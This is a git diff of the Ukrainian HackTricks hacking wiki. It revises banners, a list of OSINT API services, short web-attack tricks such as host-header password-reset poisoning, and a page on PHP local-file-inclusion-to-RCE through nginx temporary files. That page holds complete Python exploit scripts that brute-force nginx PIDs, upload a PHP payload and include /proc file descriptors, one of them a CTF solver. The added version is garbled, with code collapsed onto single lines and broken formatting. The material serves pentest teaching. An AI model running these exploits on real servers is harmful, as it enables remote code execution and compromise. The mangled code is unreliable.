{% endcode %} -## Посилання +## References * [https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/) +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub.** +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/online-platforms-with-api.md b/online-platforms-with-api.md index 807157c8a..ab152d702 100644 --- a/online-platforms-with-api.md +++ b/online-platforms-with-api.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} # [ProjectHoneypot](https://www.projecthoneypot.org/) @@ -25,7 +26,7 @@ Знаходьте та підтверджуйте електронні адреси. Деякі безкоштовні запити API безкоштовні, для отримання більшої кількості вам потрібно платити. -Комерційно? +Комерційний? # [AlientVault](https://otx.alienvault.com/api) @@ -35,17 +36,17 @@ Знаходьте особисті дані, пов'язані з електронною поштою \(профілі на інших платформах\), доменом \(основна інформація про компанію, пошти та працюючі люди\) та компаніями \(отримуйте інформацію про компанію з пошти\). Вам потрібно платити, щоб мати доступ до всіх можливостей. -Комерційно? +Комерційний? # [BuiltWith](https://builtwith.com/) -Технології, використовувані на веб-сайтах. Дорого... -Комерційно? +Технології, що використовуються на веб-сайтах. Дорого... +Комерційний? # [Fraudguard](https://fraudguard.io/) Перевірте, чи хост \(домен або IP\) пов'язаний з підозрілими/зловмисними діями. Є деякий безкоштовний доступ до API. -Комерційно? +Комерційний? # [FortiGuard](https://fortiguard.com/) @@ -61,11 +62,11 @@ # [ipinfo](https://ipinfo.io/) -Отримуйте базову інформацію з IP-адреси. Ви можете тестувати до 100 тис. на місяць. +Отримайте базову інформацію з IP-адреси. Ви можете тестувати до 100 тис. на місяць. # [securitytrails](https://securitytrails.com/app/account) -Ця платформа надає інформацію про домени та IP-адреси, таку як домени всередині IP або всередині сервера домену, домени, власність яких належить електронній пошті \(знаходьте пов'язані домени\), історія IP-адрес доменів \(знаходьте хост за CloudFlare\), всі домени, які використовують сервер імен.... +Ця платформа надає інформацію про домени та IP-адреси, таку як домени всередині IP або всередині сервера домену, домени, що належать електронній пошті \(знаходьте пов'язані домени\), історія IP-адрес доменів \(знаходьте хост за CloudFlare\), всі домени, що використовують сервер імен.... У вас є деякий безкоштовний доступ. # [fullcontact](https://www.fullcontact.com/) @@ -82,7 +83,7 @@ # [IBM X-Force Exchange](https://exchange.xforce.ibmcloud.com/) -Шукайте за IP та отримуйте інформацію, пов'язану з підозрілими діями. Є деякий безкоштовний доступ. +Шукайте за IP та збирайте інформацію, пов'язану з підозрілими діями. Є деякий безкоштовний доступ. # [Greynoise](https://viz.greynoise.io/) @@ -98,24 +99,24 @@ # [buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/) -Знаходьте відкриті S3-контейнери, шукаючи за ключовим словом. +Знаходьте відкриті S3-бакети, шукаючи за ключовим словом. # [Dehashed](https://www.dehashed.com/data) Знаходьте витікнуті облікові дані електронних адрес та навіть доменів -Комерційно? +Комерційний? # [psbdmp](https://psbdmp.ws/) -Шукайте pastebin, де з'явилася електронна пошта. Комерційно? +Шукайте pastebin, де з'явилася електронна пошта. Комерційний? # [emailrep.io](https://emailrep.io/key) -Отримуйте репутацію пошти. Комерційно? +Отримуйте репутацію пошти. Комерційний? # [ghostproject](https://ghostproject.fr/) -Отримуйте паролі з витікших електронних листів. Комерційно? +Отримуйте паролі з витікших електронних листів. Комерційний? # [Binaryedge](https://www.binaryedge.io/) @@ -123,10 +124,10 @@ # [haveibeenpwned](https://haveibeenpwned.com/) -Шукайте за доменом та електронною поштою та дізнайтеся, чи вони були скомпрометовані та паролі. Комерційно? +Шукайте за доменом та електронною поштою та дізнайтеся, чи вони були скомпрометовані та паролі. Комерційний? -[https://dnsdumpster.com/](https://dnsdumpster.com/)\(в комерційному інструменті?\) +[https://dnsdumpster.com/](https://dnsdumpster.com/)\(у комерційному інструменті?\) -[https://www.netcraft.com/](https://www.netcraft.com/) \(в комерційному інструменті?\) +[https://www.netcraft.com/](https://www.netcraft.com/) \(у комерційному інструменті?\) -[https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/) \(в комерційному інструменті?\) +[https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/) \(у комерційному інструменті?\) diff --git a/other-web-tricks.md b/other-web-tricks.md index 2d8d78e1e..5cdee27bf 100644 --- a/other-web-tricks.md +++ b/other-web-tricks.md @@ -1,31 +1,32 @@ # Інші веб-трюки +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **та** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакінг-прийоми, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ### Заголовок хоста -Декілька разів бекенд довіряє **заголовку Host**, щоб виконати деякі дії. Наприклад, він може використовувати його значення як **домен для відправки скидання пароля**. Таким чином, коли ви отримуєте електронного листа з посиланням на скидання пароля, домен, який використовується, - це той, який ви вказали в заголовку Host. Потім ви можете запитати скидання пароля інших користувачів і змінити домен на той, яким ви керуєте, щоб вкрасти їх коди скидання пароля. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2). +Декілька разів back-end довіряє **заголовку Host** для виконання деяких дій. Наприклад, він може використовувати його значення як **домен для відправлення скидання пароля**. Таким чином, коли ви отримуєте електронного листа з посиланням на скидання пароля, домен, який використовується, - це той, який ви вказали в заголовку Host. Тоді ви можете запитати скидання пароля інших користувачів та змінити домен на той, яким ви керуєте, щоб вкрасти їх коди скидання пароля. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2). {% hint style="warning" %} -Зверніть увагу, що можливо вам навіть не потрібно чекати, поки користувач натисне на посилання для скидання пароля, щоб отримати токен, оскільки можливо навіть **спам-фільтри або інші проміжні пристрої/боти натиснуть на нього, щоб проаналізувати**. +Зверніть увагу, що можливо вам навіть не потрібно чекати, поки користувач натисне на посилання для скидання пароля, щоб отримати токен, оскільки можливо навіть **спам-фільтри або інші проміжні пристрої/боти натиснуть на нього для аналізу**. {% endhint %} -### Булеві значення сесії +### Булеві значення сеансу -Іноді, коли ви правильно пройдете певну перевірку, бекенд **просто додасть булеве значення "True" до атрибуту безпеки вашої сесії**. Потім інша точка доступу буде знати, чи ви успішно пройшли цю перевірку.\ -Однак, якщо ви **пройдете перевірку** і вашій сесії буде надано це значення "True" в атрибуті безпеки, ви можете спробувати **отримати доступ до інших ресурсів**, які **залежать від того самого атрибуту**, але до яких ви **не повинні мати дозволу** на доступ. [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a). +Іноді, коли ви успішно завершуєте деяку перевірку, back-end **просто додасть булеве значення "True" до атрибуту безпеки вашого сеансу**. Потім інша точка доступу буде знати, чи успішно ви пройшли цю перевірку.\ +Однак, якщо ви **пройшли перевірку** і ваш сеанс отримав це значення "True" в атрибуті безпеки, ви можете спробувати **отримати доступ до інших ресурсів**, які **залежать від того самого атрибуту**, але до яких ви **не повинні мати дозволу** на доступ. [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a). ### Функціонал реєстрації @@ -33,7 +34,7 @@ ### Захоплення електронних листів -Зареєструйте електронну пошту, перш ніж підтвердити її, змініть електронну пошту, а потім, якщо новий лист підтвердження відправлено на першу зареєстровану електронну пошту, ви можете захопити будь-яку електронну пошту. Або якщо ви можете активувати другу електронну пошту, підтверджуючи першу, ви також можете захопити будь-який обліковий запис. +Зареєструйте електронну пошту, перед підтвердженням змініть пошту, а потім, якщо новий лист підтвердження відправлено на першу зареєстровану пошту, ви можете захопити будь-яку пошту. Або якщо ви можете активувати другу пошту, підтверджуючи першу, ви також можете захопити будь-який обліковий запис. ### Доступ до внутрішньої служби підтримки компаній, які використовують atlassian @@ -41,6 +42,22 @@ ### Метод TRACE -Розробники можуть забути вимкнути різні параметри налагодження в середовищі виробництва. Наприклад, HTTP-метод `TRACE` призначений для діагностичних цілей. Якщо він увімкнений, веб-сервер буде відповідати на запити, які використовують метод `TRACE`, повертаючи у відповіді точний запит, який було отримано. Ця поведінка часто безпечна, але іноді призводить до розкриття інформації, такої як назва внутрішніх заголовків аутентифікації, які можуть додаватися до запитів оберненими проксі-серверами.![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20) +Розробники можуть забути вимкнути різні параметри налагодження в середовищі виробництва. Наприклад, HTTP-метод `TRACE` призначений для діагностичних цілей. Якщо він увімкнений, веб-сервер буде відповідати на запити, які використовують метод `TRACE`, повертаючи у відповіді точний запит, який було отримано. Ця поведінка часто безпечна, але іноді призводить до розкриття інформації, такої як назва внутрішніх заголовків аутентифікації, які можуть додаватися до запитів реверс-проксі.![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20) ![Image for post](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png) + + +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакінг-прийоми, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. + +
+{% endhint %} diff --git a/pentesting-dns.md b/pentesting-dns.md index 0cadaeed5..b29279335 100644 --- a/pentesting-dns.md +++ b/pentesting-dns.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (Експерт з червоної команди AWS HackTricks)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} **Досліджуйте більше про атаки на DNS** @@ -18,19 +19,3 @@ **DNSSEC та DNSSEC3** **DNS в IPv6** - - - -
- -Вивчайте хакінг AWS від нуля до героя з htARTE (Експерт з червоної команди AWS HackTricks)! - -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. - -
diff --git a/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md b/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md index d9428a286..668cf4468 100644 --- a/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md +++ b/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md @@ -6,297 +6,94 @@ Інші способи підтримки HackTricks: -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! +* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! * Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) * Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub.** +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +### [WhiteIntel](https://whiteintel.io) + +
+ +[**WhiteIntel**](https://whiteintel.io) - це пошуковик, який працює на **темному вебі** і пропонує **безкоштовні** функціональні можливості для перевірки того, чи були **компанія або її клієнти скомпрометовані** **шкідливими програмами-крадіями**. + +Основною метою WhiteIntel є боротьба з захопленням облікових записів та атаками вимагання викупу, що виникають внаслідок шкідливих програм, які викрадають інформацію. + +Ви можете перевірити їх веб-сайт та спробувати їхній двигун **безкоштовно** за посиланням: + +{% embed url="https://whiteintel.io" %} + +*** + ## Вразлива конфігурація -**[Приклад з https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)** +[**Приклад з https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/) -* PHP код: +* Код PHP: + +\`\`\`\`h\` + +/dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon\_inode:\[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:\[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:\[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:\[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:\[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) ... \`\`\` Примітка: У цьому прикладі не можна безпосередньо включити \`/proc/34/fd/15\`, оскільки функція \`include\` PHP розгорне шлях до \`/var/lib/nginx/body/0000001368 (deleted)\`, який не існує в файловій системі. Це невелике обмеження можна обійти за допомогою деякої індирекції, наприклад: \`/proc/self/fd/34/../../../34/fd/15\`, що нарешті виконає вміст видаленого файлу \`/var/lib/nginx/body/0000001368\`. ## Повна експлуатація \`\`\`python #!/usr/bin/env python3 import sys, threading, requests # exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance # see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details URL = f'http://{sys.argv\[1]}:{sys.argv\[2]}/' # find nginx worker processes r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid\_max' }) pid\_max = int(r.text) print(f'\[\*] cpus: {cpus}; pid\_max: {pid\_max}') nginx\_workers = \[] for pid in range(pid\_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'\[\*] nginx worker found: {pid}') nginx\_workers.append(pid) if len(nginx\_workers) >= cpus: break done = False # upload a big client body to force nginx to create a /var/lib/nginx/body/$X def uploader(): print('\[+] starting uploader') while not done: requests.get(URL, data=' //'``` ``` - /dev/pts/0 -lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 -lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd] -lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587] -lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589] -lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926] -lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927] -lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) -... -``` -Примітка: У цьому прикладі не можна безпосередньо включити `/proc/34/fd/15`, оскільки функція `include` PHP розгорне шлях до `/var/lib/nginx/body/0000001368 (deleted)`, який не існує в файловій системі. Це невелике обмеження можна обійти за допомогою деякої опосередкованості, наприклад: `/proc/self/fd/34/../../../34/fd/15`, що нарешті виконає вміст видаленого файлу `/var/lib/nginx/body/0000001368`. - -## Повний Використання -```python -#!/usr/bin/env python3 -import sys, threading, requests - -# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance -# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details - -URL = f'http://{sys.argv[1]}:{sys.argv[2]}/' - -# find nginx worker processes -r = requests.get(URL, params={ -'file': '/proc/cpuinfo' -}) -cpus = r.text.count('processor') - -r = requests.get(URL, params={ -'file': '/proc/sys/kernel/pid_max' -}) -pid_max = int(r.text) -print(f'[*] cpus: {cpus}; pid_max: {pid_max}') - -nginx_workers = [] -for pid in range(pid_max): -r = requests.get(URL, params={ -'file': f'/proc/{pid}/cmdline' -}) - -if b'nginx: worker process' in r.content: -print(f'[*] nginx worker found: {pid}') - -nginx_workers.append(pid) -if len(nginx_workers) >= cpus: -break - -done = False - -# upload a big client body to force nginx to create a /var/lib/nginx/body/$X -def uploader(): -print('[+] starting uploader') -while not done: -requests.get(URL, data=' //' requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload))))) except: pass - -def send_payload_worker(requests_session): -while True: -send_payload(requests_session) - -def send_payload_multiprocess(requests_session): -# Use all CPUs to send the payload as request body for Nginx -for _ in range(multiprocessing.cpu_count()): -p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,)) -p.start() - -def generate_random_path_prefix(nginx_pids): -# This method creates a path from random amount of ProcFS path components. A generated path will look like /proc//cwd/proc//root/proc//root -path = "" -component_num = random.randint(0, 10) -for _ in range(component_num): -pid = random.choice(nginx_pids) -if random.randint(0, 1) == 0: -path += f"/proc/{pid}/cwd" -else: -path += f"/proc/{pid}/root" -return path - -def read_file(requests_session, nginx_pid, fd, nginx_pids): -nginx_pid_list = list(nginx_pids) -while True: -path = generate_random_path_prefix(nginx_pid_list) -path += f"/proc/{nginx_pid}/fd/{fd}" -try: -d = requests_session.get(SERVER + f"/?action=include&file={path}").text -except: -continue -# Flags are formatted as hxp{} -if "hxp" in d: -print("Found flag! ") -print(d) - -def read_file_worker(requests_session, nginx_pid, nginx_pids): -# Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range -for fd in range(10, 45): -thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids)) -thread.start() - -def read_file_multiprocess(requests_session, nginx_pids): -for nginx_pid in nginx_pids: -p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids)) -p.start() - -if __name__ == "__main__": -print('[DEBUG] Creating requests session') -requests_session = create_requests_session() -print('[DEBUG] Getting Nginx pids') -nginx_pids = get_nginx_pids(requests_session) -print(f'[DEBUG] Nginx pids: {nginx_pids}') -print('[DEBUG] Starting payload sending') -send_payload_multiprocess(requests_session) -print('[DEBUG] Starting fd readers') -read_file_multiprocess(requests_session, nginx_pids) ``` -## Лабораторії +```html +def send_payload_worker(requests_session): while True: send_payload(requests_session) + +def send_payload_multiprocess(requests_session): # Використовуйте всі ЦП для відправлення навантаження як тіло запиту для Nginx for _ in range(multiprocessing.cpu_count()): p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,)) p.start() + +def generate_random_path_prefix(nginx_pids): # Цей метод створює шлях з випадковою кількістю компонентів шляху ProcFS. Згенерований шлях буде виглядати як /proc//cwd/proc//root/proc//root path = "" component_num = random.randint(0, 10) for _ in range(component_num): pid = random.choice(nginx_pids) if random.randint(0, 1) == 0: path += f"/proc/{pid}/cwd" else: path += f"/proc/{pid}/root" return path + +def read_file(requests_session, nginx_pid, fd, nginx_pids): nginx_pid_list = list(nginx_pids) while True: path = generate_random_path_prefix(nginx_pid_list) path += f"/proc/{nginx_pid}/fd/{fd}" try: d = requests_session.get(SERVER + f"/?action=include&file={path}").text except: continue # Флаги форматуються як hxp{} if "hxp" in d: print("Знайдено прапорець! ") print(d) + +def read_file_worker(requests_session, nginx_pid, nginx_pids): # Сканування файлових дескрипторів Nginx між 10 та 45 в циклі. Оскільки файли та сокети постійно закриваються, дуже поширено, що файловий дескриптор запиту відкривається в цьому діапазоні for fd in range(10, 45): thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids)) thread.start() + +def read_file_multiprocess(requests_session, nginx_pids): for nginx_pid in nginx_pids: p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids)) p.start() + +if __name__ == "main": print('[DEBUG] Створення сеансу запитів') requests_session = create_requests_session() print('[DEBUG] Отримання ідентифікаторів Nginx') nginx_pids = get_nginx_pids(requests_session) print(f'[DEBUG] Ідентифікатори Nginx: {nginx_pids}') print('[DEBUG] Початок відправлення навантаження') send_payload_multiprocess(requests_session) print('[DEBUG] Початок читання файлових дескрипторів') read_file_multiprocess(requests_session, nginx_pids) +``` +``` + +## Labs * [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz) * [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/) * [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/) -## Посилання +## References * [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/) +### [WhiteIntel](https://whiteintel.io) + +
